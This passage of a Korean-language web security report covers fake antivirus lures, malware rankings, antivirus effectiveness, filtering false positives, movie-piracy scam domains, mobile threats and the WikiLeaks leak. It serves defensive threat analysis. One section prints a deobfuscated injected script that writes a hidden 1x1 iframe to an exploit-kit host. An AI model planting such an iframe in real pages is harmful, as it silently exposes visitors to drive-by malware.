단계에서는 시스템에 바이러스 또는 맬웨어 프로그램이 있는 것 같다는 말로 주의를 환기시킵니다. 연구자의 관점에서 보면 Linux 기반 시스템에서 Windows 팝업 경고를 본다는 것은 흥미롭습니다. 그런 다음 허위 바이러스 백신 공격은 애니메이션 처리된 검색 프로그램을 실행하여 시스템이 감염되어 수정해야 한다는 메시지를 표시합니다. 대부분의 버전에서 공격자들은 사용자가 플래시 애니메이션을 종료하여 브라우저의 제어 기능이 회복되면 문제가 되므로 올바른 단계에 따라 맬웨어를 설치할 수 있도록 두 가지 지침 상자를 제공했습니다. 또한 Linux 기반 시스템에서 Mozilla를 브라우저로 사용하고 있었는데도 Windows 시스템 트레이에서처럼 풍선 경고 그래픽을 게시했습니다. 여러 도메인에서 다양한 버전의 애니메이션 처리된 검색 기능을 사용하여 허위 바이러스 백신을 전송했습니다. 풍선 그래픽이 왼쪽 하단에 표시되는 경우도 있었습니다. 이러한 상자는 오른쪽에 표시하는 것이 훨씬 효율적입니다. 29 < >

31 2010년 하반기 6개월 동안 원격 클라이언트의 보안 평가에 대한 웹 요청과 웹 게이트웨이 어플라이언스의 최초 요청(효율성에 대한 새로운 보안 평가 캐싱) 을 기반으로 상위 10개의 위협에 대해 조사하여 Trojan-Downloader.Win32. Agent.eckq가 응답자의 50% 이상을 차지하여 1위에 올랐습니다. 1위와 큰 격차를 두고 SALITY 봇넷이 응답자의 14.6%를 차지하여 2위에 올랐습니다. 3위는 응답자의 11.5%를 차지한 TROJAN-REGISTRY-DISABLER/ 차지했습니다. 나머지 위협은 스팸성 트로이 목마인 MEBROOT/SINOWAL/TORPIG, DELSNIF, ZEUS/MUROFET, BREDOLAB, HILOTI 등과 같은 TDSS(위협 분석 도구에는 검색되지 않았지만 신뢰성 및 웹 트래픽 분석에서는 감지됨)가 차지했습니다. KOOBFACE, WALEDEC 및 PUSHDO/CUTWAIL/PANDEX가 10위 근처에 자리했습니다. 2010년 마지막 6개월에 대한 비교를 위해 2010년 11월 중순부터 12월 중순까지 1개월 분석을 통해 웜, 트로이목마, 봇넷 등을 비롯한 웹 위협에 대한 현장의 변화를 조사했습니다. 참고: 이 통계는 원격 클라이언트의 보안 평가에 대한 수요와 효율성을 위해 보안 평가를 캐싱하는 웹 게이트웨이의 최초 요청을 보여 주므로, 당사는 위협의 확장성과 새로운 위협에 대해 조사하고 있습니다. 의아하지만 어플라이언스 기반 웹 게이트웨이의 보안 평가에 대한 캐싱 효과로 인해 Trojan.Downloader.Win32가 3위로 떨어졌습니다. 흥미롭게도 TROJAN-REGISTRY-DISABLER가 빈도가 2배 이상 증가하여 1위를 차지하고 SALITY가 1개월 분석에서 48% 이상 증가했습니다. 또한 ZEUS/MUROFET 가 5배 증가하고 PUSHDO/CUTWAIL/PANDEX가 약 3배 증가했습니다. 소셜 네트워킹 공격과 관련 있는 KOOBFACE도 소폭 상승했습니다. 요약하자면 무료 도메인에서 신뢰할 수 있는 해킹된 도메인으로 이동하여 SEO 공격을 악용하는 허위 바이러스 백신, 허위 업데이트 및 악성 광고가 웹 공격의 상위를 차지했습니다. 링크 팜은 검색 엔진의 검색 결과를 감염시키고 소셜 네트워킹은 온라인 사기에 악용되고 있습니다. 30 < >

32 새로운 웹 위협이 발생한 처음 몇 시간 이번 연구에서는 새로운 웹 위협이 발생한 처음 몇 시간 이내에 사용자, 리소스 및 데이터를 보호하려면 바이러스 백신, IPS 및 방화벽으로 구성된 기존의 보안 방어 체계에 웹 방어 계층을 결합할 필요가 있다는 사실이 밝혀졌습니다. 다양한 난독 처리된 페이로드를 통해 전송되는 웹 맬웨어의 동적인 특성으로 인해 방화벽, 바이러스 백신, 단순 URL 필터링 등과 같은 기존의 방어 체계에서는 사이버 범죄가 처음 몇 시간 동안 매우 효율적으로 전송될 수 있습니다. 이러한 이유로 공격 수명이 점점 단축됩니다. 사이버 범죄에 대한 투자 수익(ROI)은 위협 랩과 서명 기반 방어 프로필에서 페이로드를 식별하여 차단할 때까지의 처음 몇 시간이 전부입니다. 매우 상이한 두 가지 방어 체계의 개발을 발견했습니다. 하나는 도메인/IP 정보, 트래픽 패턴 분석, 전달 방법 및 패키지를 공격 감지의 웹 변수로 사용하는 웹 방어이고, 다른 하나는 다운로드한 콘텐츠의 내용과 동작을 조사하는 전통적인 바이러스 백신 방어입니다. 여러 가지 이유로 두 방어 체계 모두 필요합니다. 처음 몇 시간 동안에는 웹 방어가 더 효율적인 것으로 검증되었습니다. 기존의 방어 체계는 알려진 위협을 차단하는 역할을 합니다. 최근에 세 가지 맬웨어 PDF를 발견했습니다. 두 가지는 WebPulse에서 실시간으로 감지되었고, 나머지 하나는 백그라운드 분석을 위해 플래그 지정하여 한 분석가가 신속하게 맬웨어로 태그 처리했습니다. 실시간으로 검색된 두 가지 맬웨어는 40개 이상의 바이러스 백신 엔진을 통해 파일을 분석할 수 있는 VirusTotal에서 각각 0회와 2회의 방문을 기록했습니다. 백그라운드로 캐치된 맬웨어는 VirusTotal에서 1회의 방문을 기록했습니다. 2일이 경과한 후 백그라운드에서 감지된 맬웨어는 1회의 방문이 추가되어 VirusTotal에서 7회의 방문을 기록한 반면에 실시간 감지된 맬웨어 PDF는 각각 0회와 2회의 방문을 유지했습니다. 불행하게도 이는 신호를 보내 웹 방어 계층을 강화할 수 있도록 하는 새로운 웹 위협의 일반적인 경우에 불과합니다. 여러 계층의 암호화 및 난독처리를 감지하여 맬웨어 페이로드가 감염되지 않도록 차단하는 것이 일반적인 방법입니다. 예를 들어, 우리 연구소의 JavaScript에서는 익스플로이트 패키지를 노출시키려면 14개의 코드를 통과하고 다운로드 시에 두 계층을 더 통과해야 합니다. 많은 바이러스 백신 엔진들이 암호화되거나, 난독 처리되거나, 압축된 페이로드를 기본적으로 세 개 또는 네 개의 계층만 조사하도록 설정되어 있는 데 이는 성능과 보안을 함께 고려하는 과정에서 나타나는 문제점입니다. 대부분의 분석은 그때 그때마다 연구소에서 진행되며, 두 경우 모두 성능을 우선시하여 검사 계층을 축소하는 경우가 많습니다. 이 경우 가능한 공격에 대한 요청의 빈도와 볼륨을 연구실의 분석 벤치 팀에서 최우선적으로 고려하게 됩니다. 31 < >

33 샌프란시스코에서 실시된 마지막 RSA 이벤트에서 여러 명의 발표자들이 웹 기반 위협에 대한 바이러스 백신 소프트웨어의 효율성에 대해 검토했습니다. 다양한 연구 및 분석 프로젝트에 따르면 최소 30%에서 최대 70%의 효율성이 있는 것으로 평가됩니다. 페이로드가 현재의 바이러스 백신 소프트웨어 솔루션의 감지를 피하도록 개발되는 경우가 있으므로 비공식 서비스를 이용할 수 있습니다. 사이버 범죄에서는 미끼, 동적 링크, 신뢰할 수 있는 해킹된 도메인의 인프라, 난독처리 및 암호화된 페이로드, 콜 홈 등을 활용하여 다운로드 수를 높이고 정보를 수집합니다. 그렇다면 바이러스 백신 소프트웨어를 실행하는 것이 효과가 있습니까? 예. 70%의 웹 위협을 차단하여 광범위한 보안 위협에 대한 입구를 봉쇄할 뿐만 아니라, 시스템을 패치하여 앞으로 몇 년 동안 익스플로이트 키트에 계속해서 노출될 수 있는 제로데이 취약점을 차단하는 것과 동일한 효과가 있습니다. 모든 네트워크 게이트웨이와 시스템에 대해 동일한 바이러스 백신 솔루션을 실행해야 합니까? 구매 논리에 따르면 한 공급업체로부터 더 저렴한 바이러스 백신 솔루션 제품군을 선택하겠지만, 이 경우 모든 게이트웨이에 동일한 잠금이 적용되므로 하나의 잠금을 해제하면 모든 게이트웨이가 열리게 됩니다. 두 개 이상의 바이러스 백신 솔루션을 사용하면 여러 연구소에서 사용자 측에서 연구하므로 공격 감지 능력이 강화됩니다. 당사에서도 WebPulse 클라우드 방어에서 동일한 논리를 적용하여 10개 이상의 다양한 바이러스 백신 솔루션을 다른 위험 감지 도구 및 방법과 함께 사용하여 웹 콘텐츠를 분석하고 있습니다. NSS Labs에서는 2010년 9월에 소비자에게 맬웨어 방지 제품 테스트11 결과를 발표하여 문제를 밀착하여 강조했습니다. 이 테스트에서는 사회 공학적 편법, 주요 웹 브라우저의 클라이언트측 익스플로이트, 성능 메트릭(예: 메모리, CPU, 부팅 시간 및 앱 로드 시간 개선) 등을 통해 웹 사이트에서 다운로드한 맬웨어를 분석했습니다. 이 테스트 결과에 따르면 사이버 범죄는 해마다 점점 더 지능적으로 진화하고 있습니다. 테스트를 요약하면 다음과 같습니다. -> 맬웨어 보호 제품은 54% - 90%의 효율성으로 솔루션 평가 간에 36%의 격차를 나타내어 상품성이 떨어집니다. -> 사이버 범죄에서 웹 맬웨어를 사용하여 바이러스 백신을 통과하는 비율이 10% - 45%(제품에 따라 다름)에 달합니다. -> 사이버 범죄에서 익스플로이트를 사용하여 사용자 컴퓨터를 손상시킬 확률이 25% - 97%(제품에 따라 다름)에 달합니다. -> 익스플로이트는 기존의 맬웨어보다 훨씬 더 지능적이므로 사용량이 증가할 것으로 예상됩니다. 32 < >

34 제품을 공정하게 테스트하기 위해 사용자 버전으로 테스트했습니다. 기업용 제품 버전에 대한 사용량 단위 과금 방식 테스트 보고서는 NSS Labs 웹 사이트를 참조하십시오. 사용자 제품 테스트에 대한 흥미로운 점은 무료 제품인 Microsoft Security Essentials가 경쟁 관계에 있는 유료 사용자 솔루션의 반 수 이상보다 더 높은 순위를 차지했다는 점입니다. 사용자 테스트 보고서의 경우 웹 방어를 위해 데스크톱 바이러스 백신을 보완하도록 설계된 K9 Web Protection이 테스트에 포함되었다는 점이 흥미롭습니다. 블루코트는 사용자들이 웹 위협과 평가되지 않은 웹 콘텐츠를 찾을 수 있도록 도와주기 때문에 K9에 대해 요금을 청구하지 않습니다. 웹 기반 공격에 대한 블루코트의 웹 방어 방법은 무엇인지를 묻는 질문을 많이 받습니다. 2010년은 보안 취약점의 해이고, 소셜 네트워킹과 원격 근로자들이 웹 활동과 액세스를 변경하고 있으며, 기존의 방어 체계가 웹 콘텐츠, 전달 및 분석 지식을 기반으로 하고 있지 않습니다. 웹 방어에서는 클라우드 기반 웹 분석 기술과 전문가를 활용하여 이러한 방어의 정확성을 유지 관리합니다. 대부분의 사용자 커뮤니티에서 새로운 웹 위협과 평가되지 않은 웹 콘텐츠에 대한 실시간 입력을 통해 인식을 강화하고 보다 빠르게 대응하고 있습니다. 결론적으로 바이러스 백신 만으로는 웹 공격이 개시된 처음 몇 시간 동안 웹을 방어하기가 어렵고 계층형 방어 아키텍처의 일부일 뿐입니다. 허위 경보 과잉 차단 또는 진단 오류는 사용자와 웹 사이트 관리자를 당혹하게 할 뿐만 아니라 시간과 비용을 낭비하게 합니다. 고객은 웹 평가 품질 제어 및 해결 프로세스를 정확하게 이해해야 합니다. 새 콘텐츠, 웹 위협 및 웹 뉘앙스에 대한 웹 평가를 고객에게 제공하여 당사의 자체 평가에 대한 정확도를 분석하고 바이러스 백신 엔진을 비롯하여 웹 평가를 위해 제공된 다른 솔루션에 대해 검토하고 다른 솔루션과 공정하게 경쟁할 수 있는 기회를 얻습니다. 웹 보안의 관점에서 검토하다 보면 많은 흥미로운 사실과 이점을 얻게 됩니다. 첫째, 쉽게 구분합니다. WebFilter에 대한 모든 기존 평가는 블루코트의 공개 온라인 사이트 분석 커뮤니티를 통해 검토할 수 있고 가끔 시간이 걸리는 경우는 1일 SLA로 진행됩니다. 고객이 기다려서는 안 되므로 웹 필터링 솔루션은 1일 이내에 웹 평가에 대한 피드백을 제공해야 합니다. 또한 블루코트는 일괄 평가를 제공하여 허용/차단 URL 목록을 정리된 상태로 체계적으로 관리합니다. 예외적인 사항도 비즈니스의 일부라는 사실을 잘 알고 있으므로 웹 게이트웨이의 다양한 URL 파일과 원격 사용자에 대한 별도의 URL 목록을 지원합니다. 33 < >

35 둘째, 허위 경보를 두 가지 주요 범주로 평가합니다. 첫 번째 허위 경보 영역은 언론에서 다루어 공개되고 필터링 공급업체를 의심되는 품질 제어 위치에 놓습니다. 잘 알려진 금융, 뱅킹 또는 기술 사이트를 차단할 맬웨어, 스파이웨어, 해킹 또는 기타 범주로 평가하여 고객과 언론에 빠른 경각심을 줍니다. 도메인과 IP 주소를 재사용하고 이전 소유자의 보안 평가를 당연하게 받아들이는 것이 일반화되어 있습니다. 11월 중순에 실시된 로컬 실리콘 밸리 예에서 새너제이 공립 도서관의 새로운 웹 사이트(sjpl.org)는 다양한 웹 필터링 솔루션에서 스파이웨어 또는 스팸으로 평가되거나 부적절한 것으로 평가되었습니다12. SJPL 라이브러리 중 한 곳의 블로그 입구에 과잉 차단을 다음과 같이 웹 위협으로 요약하고 있습니다. "FortiGuard, WebSense 및 Barracuda(학교, 도서관 등에 판매되는 필터링 제품)의 일부 고객은 해당 인터넷 필터가 새너제이 공공 도서관(San Jose Public Library)의 새 웹 사이트인 sjpl.org를 자신의 고객으로부터 차단하고 도서관 웹 사이트를 스파이웨어, 스팸 및/또는 "부적절한 사이트"로 표시한다고 합니다. 왜 그렇습니까? 도대체 이해를 못하겠습니다. 필터링 업체는 고객을 비롯한 어느 누구에게도 항목이 분류된 방식과 이유에 대해 말하지 않습니다. 그러한 내용은 "영업 비밀"로 간주됩니다. 이러한 투명성의 결여가 필터링 소프트웨어의 기술적인 문제 중 하나이며 어떠한 문제가 있는지 알 수 없으며 앞으로도 마찬가지일 것입니다." 위에서 설명한 것처럼 근본적인 원인은 도서관에서 사용하는 도메인이 이전에 보안 평가를 요하는 불법 도메인으로 분류되었기 때문입니다. 하지만 이 경우 SJPL은 지난 2년 동안 해당 도메인을 소유했었으며 깨끗하게 유지하면서 사용하지 않은 상태였습니다. 그렇다면 평가에 지난 2년 동안의 도메인 콘텐츠, 사용 또는 평판이 반영되지 않았다는 말입니다. 이 경우에 검토해야 할 문제점이 몇 가지 있습니다. 첫째, 위의 모든 공급업체가 최근에 맬웨어, 스파이웨어 또는 부적절한 사이트로 평가된 제3자 피드에 참여했습니까? 만약 그렇다면 필터링 공급업체의 품질 제어 능력에 문제가 있는 것입니다. 제3자 피드가 필터링 데이터베이스의 기존 평가를 무시하고 해당 평가를 차단된 보안 위협 카테고리로 변경할 수 있습니까? WebFilter의 경우에는 그렇게 할 수 없습니다. 평가자의 직접적인 검토를 거치지 않고 제3자 피드에 인해 기존 평가를 변경할 수 없습니다. 34 < >

36 둘째, 이러한 필터링 솔루션에서 맬웨어, 스파이웨어 또는 부적절한 웹 인프라의 일부일 가능성이 높다고 분류한 도메인에 대해 최근 2년 동안 평가를 실시한 적이 있습니까? 만약 그렇다면 웹 필터링 데이터베이스의 정리 상태에 문제가 있는 것입니다. 자동화를 통해 기존 평가의 정확도, 용도 및 신뢰를 지속적으로 분석해야 합니다. 실험실에서 소수의 평가자가 신규 웹 콘텐츠에 대해 결론을 내리는 구조로는 문제를 절반도 해결할 수 없습니다. 수천만 개의 기존 평가를 지속적으로 품질 제어해야 한다면 어떻게 하시겠습니까? 고객의 네트워크와 리소스를 보호하기 위해 보안 평가를 차단해야 할 경우 어떻게 하시겠습니까? 불만 있는 고객이 선택할 수 있는 대안이 많이 있는데다가 평가자가 며칠이면 사안을 검토할 수 있으므로 웹 필터링 공급업체는 지원하는 카테고리와 언어에 대한 대용량 웹 평가 자동화 도구를 보유하고 있어야 합니다. 웹 보안 평가의 경우 위협이 빠르게 진행되어 평가가 웹 필터링 데이터베이스를 빠르게 오염시킬 수 있으므로 훨씬 더 신속한 프로세스가 요구됩니다. 웹 필터링 데이터베이스의 크기는 구매자에게 더 이상 품질 가이드가 되지 않습니다. 구매자는 신규 및 기존 웹 평가에 대한 자동화된 실시간 평가 도구를 주요 품질 제어 요구 사항으로 검토할 뿐만 아니라 웹 위협에 대한 시간/일/주 단위 루프백 검사를 통해 만료된 위협 평가를 정리할 수 있는지를 검토합니다. 셋째, 이 도서관 사이트에서 맬웨어, 스파이웨어 또는 부적절한 콘텐츠를 전송하는 삽입 공격이 발생하여 단순 평가 솔루션에서 동적 링크 체인의 시작점으로 평가되었습니까? 이는 알려진 문제점입니다. 실제 맬웨어 또는 스파이웨어 호스트만 그런 평가를 거치고 공공 사이트 및 인기 사이트나 검색 엔진은 그러한 동적 링크를 제공하는 경우가 있더라도 그렇게 평가해서는 안 됩니다. DLA(동적 링크 분석)는 정확하고 유용한 WebFilter 평가를 위해 소스에 대한 다음 웹 위협을 추적하는 WebPulse 클라우드 분석의 핵심입니다. 보안 평가를 통해 인기 사이트가 차단되는 것 외에도 허위 경보의 다른 한 쪽에는 보안 평가 자체가 자리하고 있습니다. 이는 평가의 정확성을 의미하는 것입니다. 블루코트는 바이러스 백신 엔진 또는 다른 솔루션에서 보안 평가를 제공하는 예를 매주 얻으므로 고객이 블루코트의 의견을 듣고자 합니다. 웹 공격을 당한 후 문제를 해결하여 해당 도메인과 IP 주소에 더 이상 공격 요소가 없는 경우 블루코트는 필터링 데이터베이스를 이미 정리했지만 다른 공급업체 중에는 더 이상 소용 없는 평가 등급을 유지하는 경우가 있습니다. 바이러스 엔진 평가가 문제가 되는 경우 블루코트는 WebPulse 방어 클라우드에서 10 개가 넘는 엔진을 실행합니다. VirusTotal은 모든 사용자가 사용할 수 있도록 35 < >

37 개방되어 있습니다. 블루코트는 문제가 발생한 웹 콘텐츠, 링크, 스크립트 및 전체 동적 링크 경로를 조사하여 잘못 감지된 이전 공격의 JavaScript 잔여 조각을 찾은 경우도 있습니다. 다른 필터링 솔루션과의 병행 테스트에서 고객이 평가 내용을 분석하지 않고 성급하게 최종 결론을 내리는 것을 종종 봅니다. 최고 점수를 받은 솔루션이 승리합니다. 최고 점수를 받은 솔루션은 대부분의 대상을 차단했으며 이 "대상"이 실제로 문제가 됩니다. 바이러스 백신 엔진의 경우 연구소에서 몇 년 동안 진단 오류를 측정했습니다. 각 참여자의 목표는 진단 오류 평가가 가장 적으면서 검색 점수가 가장 높은 엔진을 찾는 데 있습니다. 진단 오류와 검색률이 모두 높은 경우 과잉 차단을 초래하여 위협 방어 비즈니스에 비용이 발생할 수 있습니다. 정확성을 검증하기 위해 고객 리소스가 소비됩니다. 여러 연구소에서 상황을 분석하여 실수가 있었는지만 확인해 달라는 요청을 받는 경우가 많이 있습니다. 보안 솔루션에 대한 신뢰에 어려움이 따릅니다. 테스트 점수를 높이기 위해 또는 단순히 실수로 텍스트 파일, 비디오, 이미지 및 삽입 포인터를 과잉 차단하는 경우를 종종 봅니다. 한 예로 경쟁업체의 솔루션에서 alldisneycharacters.com 사이트를 악성 사이트로 평가했다는 고객의 질문을 받았습니다13. 이 웹 사이트를 조사하여 디즈니 방문과 관련한 일부 합법적인 지침을 발견했지만 해당 사이트에 대한 결제를 유도하여 검색 엔진 결과에서 수익을 창출하는 광고 미끼 사이트가 분명했으며 약간의 수익을 올리는 것 같았습니다. 높은 수준의 평가에서는 이 사이트가 엔터테인먼트 범주로 분류될 수도 있습니다. 36 < >

38 블루코트가 HTML에서 가장 먼저 조사하는 것 중 하나는 iframe 또는 수상한 스크립트 태그입니다. 틀림 없이 이러한 태그는 HTML의 맨 아래 부분에 있습니다. 난독 처리된 JavaScript를 일반 텍스트로 변환하면 다음과 같습니다. document.write( <iframe src= hxxp://iss9w8s89xx.org/in.php%22 width=1 height=1 frameborder=0></iframe> ); 이 스크립트는 페이지에서 사용자에게 표시되지 않는 1 x 1 픽셀을 만듭니다. 이 웹 사이트는 전혀 해로운 사이트가 아닌 것처럼 보입니다. iframe은 웹 브라우저에서 iss9w8s89xx.org 참조 사이트에 대한 동적 웹 링크 요청을 자동으로 생성합니다. 이 참조 사이트는 일부 익스플로이트 키트나 허위 바이러스 백신 스캐너를 포함하고 있습니다. 이 사이트는 잠시 폐쇄되었으며 다시 정상적으로 되었을 때 오랫동안 이 도메인에 대해 맬웨어 평가 등급을 부여했습니다. 이 예와 관련하여 몇 가지 질문을 받았습니다. alldisneycharacters.com의 초기 웹 사이트가 아니라 실제 맬웨어 호스트인 iss9w8s89xx.org가 차단해야 할 위험 사이트입니다. 그렇다면 경쟁업체의 솔루션에서는 왜 alldisneycharacters. com을 차단합니까? 예, 이 사이트는 광고 미끼이며 경계선 상에 위치한 유용한 정보를 제공하지만 합법적인 사이트일 수 있습니다. 다음으로 iss9w8s89xx. org에 대한 iframe 동적 웹 링크가 비활성화되어 유해하지 않은 상태임에도 불구하고 경쟁업체의 alldisneycharacters.com 웹 사이트에 대한 악성 평가가 여전히 유지되는 이유는 무엇입니까? 정확한 대답은 iss9w8s89xx.org를 악성 사이트로 평가하고 합법적인 웹 사이트에서 iframe과 함께 사용될 때 차단하는 것입니다. alldisneycharacters. com이 사이트에 맬웨어, 스파이웨어 또는 웹 위협을 직접 호스팅한 증거가 있을 때까지는 악성 사이트로 평가해서는 안 됩니다. 마지막으로 조사하는 동안 현재 시점까지 iss9w8s89xx.org 방문에 대한 얼마나 많은 웹 요청이 있었습니까? 'whois' 정보를 조사하여 포함된 Alexa 통계에서 4백만 회 이상의 방문 기록을 확인했습니다. JavaScript의 일부가 무해한 사이트에서 일부 트래픽을 생성하는 것 같았습니다. 이러한 무해한 사이트가 트래픽을 가졌다는 이유로 차단됩니까? 37 < >

39 주요 인터넷 사기 사건 웹 서비스가 지나치게 정상적이어서 믿기 어려운 경우 어쩌면 그럴 수도 있습니다. 지난 해의 보고서에 따르면 재택 근무, 저렴한 세일 상품, 무료 상품 판매, 약품 등과 같은 각종 재정 사기가 상위를 차지했습니다. 악화된 경제 사정, 실업, 무료 WiFi 사이트를 통한 광범위한 웹 사이트 접속, 어느 정도의 속임수나 지름길을 원하는 사람의 마음 등이 이러한 사기가 성공할 수 있도록 만들어줍니다. 맬웨어가 항상 전송되는 것은 아니지만 개인 정보를 수집하고, 휴대폰 계정을 통한 신용 카드 사기 또는 결제를 유도할 수 있으며, 클릭을 통해 사기 조직의 수익이 창출됩니다. 상위 사기 사이트가 불법적/문제 사이트 카테고리로 평가되는 경우가 있습니다. 위에서 설명한 분명한 사실은 차치하고 인기 영화의 해적판 다운로드 사기라는 흥미로운 사례가 있습니다. ID와 금융 사용자 인증 정보를 입력하면 영화를 저렴한 가격에 구매하거나 훨씬 더 저렴한 가격에 대여할 수 있다는 제안은 매우 위험합니다. 많은 사용자는 이러한 상관 관계를 알지 못합니다. 이클립스가 2010년 6월 말에 출시되어 미국에서만 8,300만 달러 이상의 판매고를 올렸습니다. 가장 위대하고 성공적인 영화의 개봉에 이어 다양한 온라인 리뷰와 사용자 방문 웹 사이트가 생겨났습니다. 영화 개봉 후 5일만에 다음과 같은 도메인에서 해적판 무료 영화 다운로드를 제공하여 WebPulse에 등록되었습니다. downloadtwilighteclipse.com eclipsefullmovie.com iwatchtwilighteclipse.com thetwilighteclipse.net twilighteclipsefullmovie.com watcheclipse.tv watcheclipse111.tk watcheclipse77.wetpaint.com watch-eclipse-hd-quality.blogspot.com watch-eclipse-online.info watch-eclipse.net watch-twilight-eclipse.us watch-twilight-eclipse.info watch-twilighteclipse.com watch-twilighteclipse.net 38 < >

40 watcheclipsefree.com watcheclipsemovieonline.blogspot.com watcheclipsemovieonline.net watcheclipsemovieonline.org watcheclipseonline.com watcheclipseonlineforfree.com watcheclipseonlinefree.com watcheclipsetwilight.com watchthetwilightsagaeclipseonline.com watchtwilighteclipse.us watchtwilighteclipsemovie.com watchtwilighteclipseonlinefree.org watchtwilighteclipseonlinefree3.com watchtwilighteclipseonlinemovie.info 위의 사이트 중 대부분은 티저 사이트이거나 중앙 웹 위치로 안내하는 공급 사이트입니다. 위의 사이트는 대부분 설문조사를 작성하거나, 게임을 하거나, 사용자가 사람인지를 확인하는 질문을 하는 소수의 사이트에 동적으로 연결합니다. 먼저 스스로에게 다음과 같이 질문해 보십시오. 봇 또는 자동화된 소프트웨어가 동영상 다운로드를 원하는 이유가 무엇일까? 왜 내가 사람인지를 증명하도록 요청할까? 사용자가 첫 번째 실마리를 놓칠 경우 사이트는 계속해서 개인 정보와 신용 정보를 수집합니다. 결과적으로 사용자가 나쁜 화질의 해적판 영화 사본을 받을 수도 있고 받지 못할 수도 있습니다. 웹 사기는 계속될 것입니다. 불법적/문제 사이트는 사용자, 리소스 및 명예 보호를 위해 반드시 차단해야 합니다. 모바일 단말의 성장 ipad는 모바일 기기 시장을 획기적으로 바꾼 가장 혁신적인 기술입니다. Apple 에서 100만대의 ipod을 판매하는 데 20개월 걸렸지만, ipad는 1개월 밖에 걸리지 않았습니다. 다양한 이유로 모바일 기기 보안이 부각되었습니다. 모바일 기기 채택률이 개인 컴퓨터 채택률의 3-4배에 달합니다. 가격대가 높고 부속품이 많은 PC는 선진국과 제3세계 국가를 구분하는 기준이 되었습니다. 현재는 훨씬 저렴한 가격으로 동일한 컴퓨팅 기능을 구입하여 주머니에 넣고 다닐 수 있습니다. 모바일 기기는 제3세계 국가를 견인하고 60억 명 이상의 사용자를 정보가 난무하는 세계로 연결하여 통합합니다. 영향력이 대단하여 지역 및 국가 브랜드를 글로벌화하고 경제가 어느 정도는 모바일 추세를 따르고 있습니다. 39 < >

41 또한 모바일 기기는 사이버 범죄자가 이 보고서의 앞부분에서 설명한 다양한 방법으로 더 많은 대상에게 접근할 수 있도록 해줍니다. IDC에서 2010년 9월에 웹 액세스 기능이 있는 스마트폰을 대상으로 실시한 검토 보고서14에 따르면 2009년의 1억 7,400만 대에서 2010년에는 2억 7천만 대로 55.4% 성장했으며 2011년에는 24.5%가 증가할 것으로 예상됩니다. 시장 점유율 1위인 Symbian OS와 Apple의 IOS, Android 및 Blackberry OS가 전체 모바일 장치 운영 체제의 91%를 차지합니다. 이것만으로도 사이버 범죄자에게 유리한 분산된 사용 기반이 구축될 뿐만 아니라 대부분 Windows 환경을 기반으로 하는 PC에 비해 다양한 이기종 환경으로 구성된 모바일 기기에 보안을 제공하는 보안 공급업체에게는 높은 장애물이 됩니다. 태블릿, 패드 등도 혁신적 기술이라고 설명할 수 있지만 Apple의 ipad는 특히 더 그렇습니다. Apple은 2010년에 8백만 대 이상의 장치를 판매하여 당장에 iphone에 필적하는 매출을 올렸습니다. 2011년에는 천만 대 이상을 판매할 것으로 예상하며 삼성의 갤럭시 S와 같은 경쟁업체의 많은 신제품이 출시될 것입니다. 2010년 11월에 Wall Street Journal은 태블릿 시장이 2014년까지 1억 1,500만대 규모로 성장하여 미화 550억 달러 이상의 매출과 110억 달러의 수익을 창출하여 66.5% CAGR을 기록할 것으로 예상했습니다. 이렇게 빠르게 성장하는 혁신적 기술로 인해 노트북 및 넷북 사용이 감소할 수 있습니다. 여러 하드웨어 공급업체에서 지원하는 Android는 모바일 장치 운영 체제 부문에서 미국 내 1위, 전세계 3위를 차지하고 있습니다. IDC는 2014년까지 51% 이상 성장률을 기록할 것으로 예상하면서 Blackberry OS는 보합세를 유지하고 Symbian과 IOS는 시장 점유율을 내줬습니다. 개방형 운영 체제로서 모바일 장치 보안에 미치는 영향은 두고 봐야 합니다. 모바일 장치로 인해 온라인 앱스토어가 도입되어 개발자가 자신의 앱을 무료 또는 유로로 게시할 수 있습니다. 이 개방형 코드 베이스는 동시에 보안 위험을 야기합니다. 일부 앱은 정직한 의도로 개발되지만 많은 앱은 사이버 범죄 집단의 미끼로 사용됩니다. 모바일 장치는 이미 공격을 받고 있습니다. 금융 거래의 유효성을 확인하는 SMS 메시지를 중간에 차단하여 금융 계정에 대한 중요 사용자 인증 정보를 수집한 경우도 있었습니다. 웹 브라우저와 웹 위협에 대해 PC 사용자가 배웠던 경험이 모바일 장치에도 그대로 적용됩니다. 모바일 장치를 통해 처음 웹에 액세스하는 신규 사용자의 경우에도 마찬가지입니다. 40 < >

42 DLP 업데이트 위키리크스(Wikileaks) 세부 사항 기밀 정보가 들어 있는 여러 도메인에 대한 액세스 권한을 가진 22살 청년은 데이터 유출 보안 세계의 전형이 되었을 뿐만 아니라 데이터 보호에 대한 경각심을 일깨워 주었습니다. 위키리크스와 설립자 Julian Assange와 26만 개 이상의 기밀 문서가 누출된 미국무부가 올해의 데이터 유출 헤드라인을 장식했습니다. 기밀 문서에 대한 액세스 권한이 승인된 한 내부자가 여러 건의 초기 데이터 유출에서 내부 고발자가 되었습니다. 결국 전세계 무정부화 및 복수심이 그의 동기가 되었습니다. 이 사건에서 우리는 아무리 안 좋은 상황에서도 긍정적인 측면은 있다는 중요한 교훈을 얻을 수 있습니다. 먼저 바그다드 외곽에 살고 있는 22살의 군사 정보 분석가인 PFC Bradley Manning은 전례없이 일급기밀/SCI 기밀 정보에 8개월 동안 하루에 14시간씩 일주일 내내 액세스했습니다. 기밀 네트워크가 다른 네트워크에서 에어 갭되어 PFC는 그의 역할에 대해 교육을 받았습니다. 기밀 자료에 대한 그의 본능은 자신이 부당하다고 생각하는 자료를 유출하는 결과로 이끌었습니다. Manning은 여러 명의 시민들의 목숨을 앗아간 2007년의 바그다드 헬리콥터 공습 동영상을 유출했습니다. 이 동영상은 4월에 게시되어 헤드라인을 장식했습니다. 또한 그는 아프가니스탄에서 있었던 2009년 Garani 공습 비디오를 유출했으며 이 외에도 260,000건 이상의 미국무부 기밀 문서를 유출했습니다. 시험 삼아 한 일이 커져서 엄청난 결과를 가져오게 됩니다. 2010년 6월 6일 WIRED 잡지 기사 "위키리크스 비디오 프로브에 체포된 미국 군사 정보 분석가"에 인용된 내용을 통해 그의 환경과 동기에 대해 자세히 살펴볼 수 있습니다15. "'레이디가가'와 같은 레이블이 붙은 음악 CD-RW를 가지고 들어와서 음악을 지운 다음 압축된 분할 파일을 작성해서 가지고 나왔습니다."라고 그는 말합니다. "어느 누구도 의심하지 않았으며, 당연히 앞으로도 계속 그럴 것이라고 생각했습니다." "나는 레이디가가의 'Telephone'을 흥얼거리며 따라하면서 미국 역사상 최대의 데이터 유출 현장을 빠져나왔습니다."라고 부연 설명했습니다. "약점이 많은 서버, 약한 로깅, 약한 물리적 보안, 부족한 대간첩 첩보 활동, 